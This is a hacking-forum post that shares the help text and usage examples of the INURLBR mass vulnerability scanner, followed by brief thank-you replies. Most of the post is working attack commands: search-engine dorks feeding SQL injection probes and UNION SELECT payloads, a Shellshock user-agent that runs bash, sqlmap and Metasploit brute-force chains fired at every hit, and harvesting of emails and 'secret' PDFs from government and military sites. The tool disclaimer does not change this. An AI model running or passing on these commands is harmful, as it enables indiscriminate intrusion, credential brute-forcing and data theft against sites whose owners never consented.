ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 6136

SCANNER - INURLBR

by blink - 04-29-2017 - 10:42 AM
#1
SCANNER - INURLBR

[Image: attachment.php?aid=242]


Advanced search in search engines,
Allows the analysis provided to exploit GET / POST capture emails & urls,
With an internal custom validation junction for each target / url found.




Code:
[align=center] +-----------------------------------------------------------------------------+[/align]
[align=center]   |  [!] Legal disclaimer: Usage of INURLBR for attacking targets without prior |[/align]
[align=center]   |  mutual consent is illegal.                                                 |[/align]
[align=center]   |  It is the end user's responsibility to obey all applicable local, state and|[/align]
[align=center]   |  federal laws.                                                              |[/align]
[align=center]   |  Developers assume no liability and are not responsible for any misuse or   |[/align]
[align=center]   |  damage caused by this program                                              |[/align]
[align=center]   +-----------------------------------------------------------------------------+[/align]

Code:
[align=center] ----------------------------------------------------------[/align]
[align=center]PHP Version         5.4.7[/align]
[align=center]php5-curl           LIB[/align]
[align=center]php5-cli            LIB   [/align]
[align=center]cURL support        enabled[/align]
[align=center]cURL Information    7.24.0[/align]
[align=center]allow_url_fopen     On[/align]
[align=center]permission          Reading & Writing[/align]
[align=center]User                root privilege, or is in the sudoers group[/align]
[align=center]Operating system    LINUX[/align]
[align=center]Proxy random        TOR [/align]
[align=center] ----------------------------------------------------------[/align]
[align=center][+] PERMISSION EXECUTION: chmod +x inurlbr.php[/align]
[align=center][+] INSTALLING LIB CURL: sudo apt-get install php5-curl[/align]
[align=center][+] INSTALLING LIB CLI: sudo apt-get install php5-cli[/align]
[align=center][+] INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en[/align]
[align=center] ----------------------------------------------------------[/align]
[align=center]resume: apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl[/align]

Code:
[align=center]-h[/align]
[align=center]--help   Alternative long length help command.[/align]
[align=center]--ajuda  Command to specify Help.[/align]
[align=center]--info   Information script.[/align]
[align=center]--update Code update.    [/align]
[align=center]-q       Choose which search engine you want through [1...24] / [e1..6]]:[/align]
[align=center]     [options]:[/align]
[align=center]     1   - GOOGLE / (CSE) GENERIC RANDOM / API[/align]
[align=center]     2   - BING[/align]
[align=center]     3   - YAHOO BR[/align]
[align=center]     4   - ASK[/align]
[align=center]     5   - HAO123 BR[/align]
[align=center]     6   - GOOGLE (API)[/align]
[align=center]     7   - LYCOS[/align]
[align=center]     8   - UOL BR[/align]
[align=center]     9   - YAHOO US[/align]
[align=center]     10  - SAPO[/align]
[align=center]     11  - DMOZ[/align]
[align=center]     12  - GIGABLAST[/align]
[align=center]     13  - NEVER[/align]
[align=center]     14  - BAIDU BR[/align]
[align=center]     15  - YANDEX[/align]
[align=center]     16  - ZOO[/align]
[align=center]     17  - HOTBOT[/align]
[align=center]     18  - ZHONGSOU[/align]
[align=center]     19  - HKSEARCH[/align]
[align=center]     20  - EZILION[/align]
[align=center]     21  - SOGOU[/align]
[align=center]     22  - DUCK DUCK GO[/align]
[align=center]     23  - BOOROW[/align]
[align=center]     24  - GOOGLE(CSE) GENERIC RANDOM[/align]
[align=center]     ----------------------------------------[/align]
[align=center]                 SPECIAL MOTORS[/align]
[align=center]     ----------------------------------------[/align]
[align=center]     e1  - TOR FIND[/align]
[align=center]     e2  - ELEPHANT[/align]
[align=center]     e3  - TORSEARCH[/align]
[align=center]     e4  - WIKILEAKS[/align]
[align=center]     e5  - OTN[/align]
[align=center]     e6  - EXPLOITS SHODAN[/align]
[align=center]     ----------------------------------------[/align]
[align=center]     all - All search engines / not special motors[/align]
[align=center]     Default:    1[/align]
[align=center]     Example: -q {op}[/align]
[align=center]     Usage:   -q 1[/align]
[align=center]              -q 5[/align]
[align=center]               Using more than one engine:  -q 1,2,5,6,11,24[/align]
[align=center]               Using all engines:      -q all[/align]
[align=center][/align]
[align=center] --proxy Choose which proxy you want to use through the search engine:[/align]
[align=center]     Example: --proxy {proxy:port}[/align]
[align=center]     Usage:   --proxy localhost:8118[/align]
[align=center]              --proxy socks5://googleinurl@localhost:9050[/align]
[align=center]              --proxy http://admin:[email protected]:8080[/align]
[align=center][/align]
[align=center] --proxy-file Set font file to randomize your proxy to each search engine.[/align]
[align=center]     Example: --proxy-file {proxys}[/align]
[align=center]     Usage:   --proxy-file proxys_list.txt[/align]
[align=center][/align]
[align=center] --time-proxy Set the time how often the proxy will be exchanged.[/align]
[align=center]     Example: --time-proxy {second}[/align]
[align=center]     Usage:   --time-proxy 10[/align]
[align=center][/align]
[align=center] --proxy-http-file Set file with urls http proxy, [/align]
[align=center]     are used to bular capch search engines[/align]
[align=center]     Example: --proxy-http-file {youfilehttp}[/align]
[align=center]     Usage:   --proxy-http-file http_proxys.txt[/align]
[align=center][/align]
[align=center][/align]
[align=center] --tor-random Enables the TOR function, each usage links an unique IP.[/align]
[align=center][/align]
[align=center] -t  Choose the validation type: op 1, 2, 3, 4, 5[/align]
[align=center]     [options]:[/align]
[align=center]     1   - The first type uses default errors considering the script:[/align]
[align=center]     It establishes connection with the exploit through the get method.[/align]
[align=center]     Demo: www.alvo.com.br/pasta/index.php?id={exploit}[/align]
[align=center][/align]
[align=center]     2   -  The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'[/align]
[align=center]     It also establishes connection with the exploit through the get method[/align]
[align=center]     Demo: www.alvo.com.br/pasta/index.php?id={exploit}[/align]
[align=center][/align]
[align=center]     3   - The third type combine both first and second types:[/align]
[align=center]     Then, of course, it also establishes connection with the exploit through the get method[/align]
[align=center]     Demo: www.target.com.br{exploit}[/align]
[align=center]     Default:    1[/align]
[align=center]     Example: -t {op}[/align]
[align=center]     Usage:   -t 1[/align]
[align=center][/align]
[align=center]     4   - The fourth type a validation based on source file and will be enabled scanner standard functions.[/align]
[align=center]     The source file their values are concatenated with target url.[/align]
[align=center]     - Set your target with command --target {http://target}[/align]
[align=center]     - Set your file with command -o {file}[/align]
[align=center]     Explicative:[/align]
[align=center]     Source file values:[/align]
[align=center]     /admin/index.php?id=[/align]
[align=center]     /pag/index.php?id=[/align]
[align=center]     /brazil.php?new=[/align]
[align=center]     Demo: [/align]
[align=center]     www.target.com.br/admin/index.php?id={exploit}[/align]
[align=center]     www.target.com.br/pag/index.php?id={exploit}[/align]
[align=center]     www.target.com.br/brazil.php?new={exploit}[/align]
[align=center][/align]
[align=center]     5   - (FIND PAGE) The fifth type of validation based on the source file,[/align]
[align=center]     Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.[/align]
[align=center]     - Set your target with command --target {http://target}[/align]
[align=center]     - Set your file with command -o {file}[/align]
[align=center]     Explicative:[/align]
[align=center]     Source file values:[/align]
[align=center]     /admin/admin.php[/align]
[align=center]     /admin.asp[/align]
[align=center]     /admin.aspx[/align]
[align=center]     Demo: [/align]
[align=center]     www.target.com.br/admin/admin.php[/align]
[align=center]     www.target.com.br/admin.asp[/align]
[align=center]     www.target.com.br/admin.aspx[/align]
[align=center]     Observation: If it shows the code 200 will be separated in the output file[/align]
[align=center][/align]
[align=center]     DEFAULT ERRORS:  [/align]
[align=center][/align]
[align=center]     [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL,           [*]ZEND FRAMEWORK, [/align][*]
[align=center]     [*]ERROR MARIADB,   [*]ERROR MYSQL,          [*]ERROR JBOSSWEB,        [*]ERROR MICROSOFT,[/align][*]
[align=center]     [*]ERROR ODBC,      [*]ERROR POSTGRESQL,     [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,[/align][*]
[align=center]     [*]CMS WORDPRESS,   [*]SHELL WEB,            [*]ERROR JDBC,            [*]ERROR ASP,[/align][*]
[align=center]     [*]ERROR ORACLE,    [*]ERROR DB2,            [*]JDBC CFM,              [*]ERROS LUA, [/align][*]
[align=center]     [*]ERROR INDEFINITE[/align][*]
[align=center][/align]
[align=center][/align]
[align=center] --dork Defines which dork the search engine will use.[/align]
[align=center]     Example: --dork {dork}[/align]
[align=center]     Usage:   --dork 'site:.gov.br inurl:php? id'[/align]
[align=center]     - Using multiples dorks:[/align]
[align=center]     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}[/align]
[align=center]     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'[/align]
[align=center][/align]
[align=center] --dork-file Set font file with your search dorks.[/align]
[align=center]     Example: --dork-file {dork_file}[/align]
[align=center]     Usage:   --dork-file 'dorks.txt'[/align]
[align=center][/align]
[align=center] --exploit-get Defines which exploit will be injected through the GET method to each URL found.[/align]
[align=center]     Example: --exploit-get {exploit_get}[/align]
[align=center]     Usage:   --exploit-get "?'´%270x27;"[/align]
[align=center][/align]
[align=center] --exploit-post Defines which exploit will be injected through the POST method to each URL found.[/align]
[align=center]     Example: --exploit-post {exploit_post}[/align]
[align=center]     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'[/align]
[align=center][/align]
[align=center] --exploit-command Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all.   [/align]
[align=center]     The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_      [/align]
[align=center]     Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'[/align]
[align=center]     _TARGET_ is the specified URL/TARGET obtained by the process[/align]
[align=center]     _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.[/align]
[align=center]     Example: --exploit-command {exploit-command}[/align]
[align=center]     Usage:   --exploit-command '/admin/config.conf'  [/align]
[align=center][/align]
[align=center] -a  Specify the string that will be used on the search script:[/align]
[align=center]     Example: -a {string}[/align]
[align=center]     Usage:   -a '<title>hello world</title>'[/align]
[align=center][/align]
[align=center] -d  Specify the script usage op 1, 2, 3, 4, 5.[/align]
[align=center]     Example: -d {op}[/align]
[align=center]     Usage:   -d 1 /URL of the search engine.[/align]
[align=center]              -d 2 /Show all the url.[/align]
[align=center]              -d 3 /Detailed request of every URL.[/align]
[align=center]              -d 4 /Shows the HTML of every URL.[/align]
[align=center]              -d 5 /Detailed request of all URLs.[/align]
[align=center]              -d 6 /Detailed PING - PONG irc.    [/align]
[align=center][/align]
[align=center] -s  Specify the output file where it will be saved the vulnerable URLs.[/align]
[align=center][/align]
[align=center]     Example: -s {file}[/align]
[align=center]     Usage:   -s your_file.txt[/align]
[align=center][/align]
[align=center] -o  Manually manage the vulnerable URLs you want to use from a file, without using a search engine.[/align]
[align=center]     Example: -o {file_where_my_urls_are}[/align]
[align=center]     Usage:   -o tests.txt[/align]
[align=center][/align]
[align=center] --persist  Attempts when Google blocks your search.[/align]
[align=center]     The script tries to another google host / default = 4[/align]
[align=center]     Example: --persist {number_attempts}[/align]
[align=center]     Usage:   --persist 7[/align]
[align=center][/align]
[align=center] --ifredirect  Return validation method post REDIRECT_URL[/align]
[align=center]     Example: --ifredirect {string_validation}[/align]
[align=center]     Usage:   --ifredirect '/admin/painel.php'[/align]
[align=center][/align]
[align=center] -m  Enable the search for emails on the urls specified.[/align]
[align=center][/align]
[align=center] -u  Enables the search for URL lists on the url specified.[/align]
[align=center][/align]
[align=center] --gc Enable validation of values with google webcache.[/align]
[align=center][/align]
[align=center] --pr  Progressive scan, used to set operators (dorks), [/align]
[align=center]     makes the search of a dork and valid results, then goes a dork at a time.[/align]
[align=center][/align]
[align=center] --file-cookie Open cookie file.[/align]
[align=center][/align]
[align=center] --save-as Save results in a certain place.[/align]
[align=center][/align]
[align=center] --shellshock Explore shellshock vulnerability by setting a malicious user-agent.[/align]
[align=center][/align]
[align=center] --popup Run --command all or vuln in a parallel terminal.[/align]
[align=center][/align]
[align=center] --cms-check Enable simple check if the url / target is using CMS.[/align]
[align=center][/align]
[align=center] --no-banner Remove the script presentation banner.[/align]
[align=center][/align]
[align=center] --unique Filter results in unique domains.[/align]
[align=center][/align]
[align=center] --beep Beep sound when a vulnerability is found.[/align]
[align=center][/align]
[align=center] --alexa-rank Show alexa positioning in the results.[/align]
[align=center][/align]
[align=center] --robots Show values file robots.[/align]
[align=center][/align]
[align=center] --range Set range IP.[/align]
[align=center]      Example: --range {range_start,rage_end}[/align]
[align=center]      Usage:   --range '172.16.0.5#172.16.0.255'[/align]
[align=center][/align]
[align=center] --range-rand Set amount of random ips.[/align]
[align=center]      Example: --range-rand {rand}[/align]
[align=center]      Usage:   --range-rand '50'[/align]
[align=center][/align]
[align=center] --irc Sending vulnerable to IRC / server channel.[/align]
[align=center]      Example: --irc {server#channel}[/align]
[align=center]      Usage:   --irc 'irc.rizon.net#inurlbrasil'[/align]
[align=center][/align]
[align=center] --http-header Set HTTP header.[/align]
[align=center]      Example: --http-header {youemail}[/align]
[align=center]      Usage:   --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'[/align]
[align=center][/align]
[align=center] --sedmail Sending vulnerable to email.[/align]
[align=center]      Example: --sedmail {youemail}[/align]
[align=center]      Usage:   --sedmail [email protected][/align]
[align=center][/align]
[align=center] --delay Delay between research processes.[/align]
[align=center]      Example: --delay {second}[/align]
[align=center]      Usage:   --delay 10[/align]
[align=center][/align]
[align=center] --time-out Timeout to exit the process.[/align]
[align=center]      Example: --time-out {second}[/align]
[align=center]      Usage:   --time-out 10[/align]
[align=center][/align]
[align=center] --ifurl Filter URLs based on their argument.[/align]
[align=center]      Example: --ifurl {ifurl}[/align]
[align=center]      Usage:   --ifurl index.php?id=[/align]
[align=center][/align]
[align=center] --ifcode Valid results based on your return http code.[/align]
[align=center]      Example: --ifcode {ifcode}[/align]
[align=center]      Usage:   --ifcode 200[/align]
[align=center][/align]
[align=center] --ifemail Filter E-mails based on their argument.[/align]
[align=center]     Example: --ifemail {file_where_my_emails_are}[/align]
[align=center]     Usage:   --ifemail sp.gov.br[/align]
[align=center][/align]
[align=center] --url-reference Define referring URL in the request to send him against the target.[/align]
[align=center]      Example: --url-reference {url}[/align]
[align=center]      Usage:   --url-reference http://target.com/admin/user/valid.php[/align]
[align=center][/align]
[align=center] --mp Limits the number of pages in the search engines.[/align]
[align=center]     Example: --mp {limit}[/align]
[align=center]     Usage:   --mp 50[/align]
[align=center][/align]
[align=center] --user-agent Define the user agent used in its request against the target.[/align]
[align=center]      Example: --user-agent {agent}[/align]
[align=center]      Usage:   --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'[/align]
[align=center]      Usage-exploit / SHELLSHOCK:   [/align]
[align=center]      --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'[/align]
[align=center]      Complete command:    [/align]
[align=center]      php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'[/align]
[align=center][/align]
[align=center] --sall Saves all urls found by the scanner.[/align]
[align=center]     Example: --sall {file}[/align]
[align=center]     Usage:   --sall your_file.txt[/align]
[align=center][/align]
[align=center] --command-vul Every vulnerable URL found will execute this command parameters.[/align]
[align=center]     Example: --command-vul {command}[/align]
[align=center]     Usage:   --command-vul 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center]              --command-vul './exploit.sh _TARGET_ output.txt'[/align]
[align=center]              --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'[/align]
[align=center][/align]
[align=center] --command-all Use this commmand to specify a single command to EVERY URL found.[/align]
[align=center]     Example: --command-all {command}[/align]
[align=center]     Usage:   --command-all 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center]              --command-all './exploit.sh _TARGET_ output.txt'[/align]
[align=center]              --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'[/align]
[align=center]    [!] Observation:[/align]
[align=center][/align]
[align=center]    _TARGET_ will be replaced by the URL/target found, although if the user  [/align]
[align=center]    doesn't input the get, only the domain will be executed.[/align]
[align=center][/align]
[align=center]    _TARGETFULL_ will be replaced by the original URL / target found.[/align]
[align=center][/align]
[align=center]    _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.[/align]
[align=center][/align]
[align=center]    _TARGETIP_ return of ip URL / target found.[/align]
[align=center][/align]
[align=center]    _URI_ Back URL set of folders / target found.[/align]
[align=center][/align]
[align=center]    _RANDOM_ Random strings.[/align]
[align=center][/align]
[align=center]    _PORT_ Capture port of the current test, within the --port-scan process.[/align]
[align=center][/align]
[align=center]    _EXPLOIT_  will be replaced by the specified command argument --exploit-command.[/align]
[align=center]   The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_[/align]
[align=center][/align]
[align=center] --replace Replace values in the target URL.[/align]
[align=center]    Example:  --replace {value_old[INURL]value_new}[/align]
[align=center]     Usage:   --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'[/align]
[align=center]              --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'[/align]
[align=center]              --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'[/align]
[align=center][/align]
[align=center] --remove Remove values in the target URL.[/align]
[align=center]      Example: --remove {string}[/align]
[align=center]      Usage:   --remove '/admin.php?id=0'[/align]
[align=center][/align]
[align=center] --regexp Using regular expression to validate his research, the value of the [/align]
[align=center]    Expression will be sought within the target/URL.[/align]
[align=center]    Example:  --regexp {regular_expression}[/align]
[align=center]    All Major Credit Cards:[/align]
[align=center]    Usage:    --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'[/align]
[align=center][/align]
[align=center]    IP Addresses:[/align]
[align=center]    Usage:    --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'[/align]
[align=center][/align]
[align=center]    EMAIL:   [/align]
[align=center]    Usage:    --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'[/align]
[align=center][/align]
[align=center][/align]
[align=center] ---regexp-filter Using regular expression to filter his research, the value of the [/align]
[align=center]     Expression will be sought within the target/URL.[/align]
[align=center]    Example:  ---regexp-filter {regular_expression}[/align]
[align=center]    EMAIL:   [/align]
[align=center]    Usage:    ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'[/align]
[align=center][/align]
[align=center][/align]
[align=center]    [!] Small commands manager:[/align]
[align=center][/align]
[align=center] --exploit-cad Command register for use within the scanner.[/align]
[align=center]    Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}[/align]
[align=center]    Example Format: NMAP::nmap -sV _TARGET_[/align]
[align=center]    Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt[/align]
[align=center]    Usage:    --exploit-cad 'NMAP::nmap -sV _TARGET_' [/align]
[align=center]    Observation: Each registered command is identified by an id of your array.[/align]
[align=center]                 Commands are logged in exploits.conf file.[/align]
[align=center][/align]
[align=center] --exploit-all-id Execute commands, exploits based on id of use,[/align]
[align=center]    (all) is run for each target found by the engine.[/align]
[align=center]     Example: --exploit-all-id {id,id}[/align]
[align=center]     Usage:   --exploit-all-id 1,2,8,22[/align]
[align=center][/align]
[align=center] --exploit-vul-id Execute commands, exploits based on id of use,[/align]
[align=center]    (vull) run command only if the target was considered vulnerable.[/align]
[align=center]     Example: --exploit-vul-id {id,id}[/align]
[align=center]     Usage:   --exploit-vul-id 1,2,8,22[/align]
[align=center][/align]
[align=center] --exploit-list List all entries command in exploits.conf file.[/align]
[align=center][/align]
[align=center][/align]
[align=center]    [!] Running subprocesses:[/align]
[align=center][/align]
[align=center] --sub-file  Subprocess performs an injection [/align]
[align=center]     strings in URLs found by the engine, via GET or POST.[/align]
[align=center]     Example: --sub-file {youfile}[/align]
[align=center]     Usage:   --sub-file exploits_get.txt[/align]
[align=center][/align]
[align=center] --sub-get defines whether the strings coming from [/align]
[align=center]     --sub-file will be injected via GET.[/align]
[align=center]     Usage:   --sub-get[/align]
[align=center][/align]
[align=center] --sub-post defines whether the strings coming from [/align]
[align=center]     --sub-file will be injected via POST.[/align]
[align=center]     Usage:   --sub-get[/align]
[align=center][/align]
[align=center][/align]
[align=center] --sub-cmd-vul Each vulnerable URL found within the sub-process[/align]
[align=center]     will execute the parameters of this command.[/align]
[align=center]     Example: --sub-cmd-vul {command}[/align]
[align=center]     Usage:   --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center]              --sub-cmd-vul './exploit.sh _TARGET_ output.txt'[/align]
[align=center]              --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'[/align]
[align=center][/align]
[align=center] --sub-cmd-all Run command to each target found within the sub-process scope.[/align]
[align=center]     Example: --sub-cmd-all {command}[/align]
[align=center]     Usage:   --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center]              --sub-cmd-all './exploit.sh _TARGET_ output.txt'[/align]
[align=center]              --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'[/align]
[align=center][/align]
[align=center][/align]
[align=center] --port-scan Defines ports that will be validated as open.[/align]
[align=center]     Example: --port-scan {ports}[/align]
[align=center]     Usage:   --port-scan '22,21,23,3306'[/align]
[align=center][/align]
[align=center] --port-cmd Define command that runs when finding an open door.[/align]
[align=center]     Example: --port-cmd {command}[/align]
[align=center]     Usage:   --port-cmd './xpl _TARGETIP_:_PORT_'[/align]
[align=center]              --port-cmd './xpl _TARGETIP_/file.php?sqli=1'[/align]
[align=center][/align]
[align=center] --port-write Send values for door.[/align]
[align=center]     Example: --port-write {'value0','value1','value3'}[/align]
[align=center]     Usage:   --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"[/align]
[align=center][/align]
[align=center][/align]
[align=center][/align]
[align=center]    [!] Modifying values used within script parameters:[/align]
[align=center][/align]
[align=center] md5 Encrypt values in md5.[/align]
[align=center]     Example: md5({value})[/align]
[align=center]     Usage:   md5(102030)[/align]
[align=center]     Usage:   --exploit-get 'user?id=md5(102030)'[/align]
[align=center][/align]
[align=center] base64 Encrypt values in base64.[/align]
[align=center]     Example: base64({value})[/align]
[align=center]     Usage:   base64(102030)[/align]
[align=center]     Usage:   --exploit-get 'user?id=base64(102030)'[/align]
[align=center][/align]
[align=center] hex Encrypt values in hex.[/align]
[align=center]     Example: hex({value})[/align]
[align=center]     Usage:   hex(102030)[/align]
[align=center]     Usage:   --exploit-get 'user?id=hex(102030)'[/align]
[align=center][/align]
[align=center] Generate random values.[/align]
[align=center]     Example: random({character_counter})[/align]
[align=center]     Usage:   random(8)[/align]
[align=center]     Usage:   --exploit-get 'user?id=random(8)'[/align]




COMMANDS SIMPLE:







Code:
[align=center]./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"  [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'        [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'new.php?id=' -s teste.txt  --exploit-get ?´0x27  --command-vul 'nmap sV -p 22,80,21 _TARGET_'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1  --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id  1,2,6  [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent  'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id  1,2,6 [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id  1,2,6  --irc 'irc.rizon.net#inurlbrasil'   [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'  [/align]
[align=center][/align]
[align=center]./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4[/align]
[align=center][/align]
[align=center]./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"[/align]
[align=center][/align]
[align=center]./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'[/align]
[align=center][/align]
[align=center]./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5[/align]
[align=center][/align]
[align=center]./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'  [/align]
[align=center][/align]
[align=center]./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'  [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8  [/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8   --pr[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8   --pr --shellshock[/align]
[align=center][/align]
[align=center]./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8  --sub-file 'xpls_Arbitrary_File_Download.txt'  [/align]



dell links



:business:
Reply
#2
nice this tools good
Reply
#3
thanks man. This is app full?? or then crack for function?
Reply
#4
thank you very much for this share
Reply

Users browsing: 2 Guest(s)